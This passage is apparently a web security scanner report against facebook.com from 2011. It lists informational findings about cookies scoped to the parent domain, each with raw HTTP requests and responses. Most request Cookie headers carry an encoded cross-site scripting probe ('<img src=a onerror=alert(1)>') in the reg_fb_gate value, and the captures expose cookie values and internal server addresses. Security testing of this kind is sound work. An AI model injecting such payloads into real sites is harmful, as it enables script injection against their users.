The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
  • next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.19.117
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.51. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • _e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php?next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: _e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.101.59
X-Cnection: close
Date: Thu, 05 May 2011 12:46:07 GMT
Content-Length: 18187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.52. http://www.facebook.com/mapquest

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mapquest

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mapquest HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/MapQuest
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.49
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 0


10.53. http://www.facebook.com/matthew.oliveira2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /matthew.oliveira2

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /matthew.oliveira2 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.54. http://www.facebook.com/mmafighting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mmafighting

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mmafighting HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.164.73
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 198589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.55. http://www.facebook.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.111
Connection: close
Date: Thu, 05 May 2011 10:56:38 GMT
Content-Length: 0


10.56. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.25
X-Cnection: close
Date: Thu, 05 May 2011 11:41:04 GMT
Content-Length: 17082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.57. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
  • next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?settings HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; wd=1022x1007; act=1304613664644%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613664645%2C%22act%22%2C1304613664644%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C181%2C760%2C0%2C1006%2C16%5D

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 0


10.58. http://www.facebook.com/pages/Barnesville/115038011847083

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Barnesville/115038011847083

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Barnesville/115038011847083 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.47
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 26916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.59. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Beacon-of-Hope-Resource-Center/34194116820 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.43
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 129142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.60. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Bernicks-Pepsi/123296084349478

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Bernicks-Pepsi/123296084349478 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.35
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.61. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Blaine-Senior-High/106189406087059

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Blaine-Senior-High/106189406087059 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
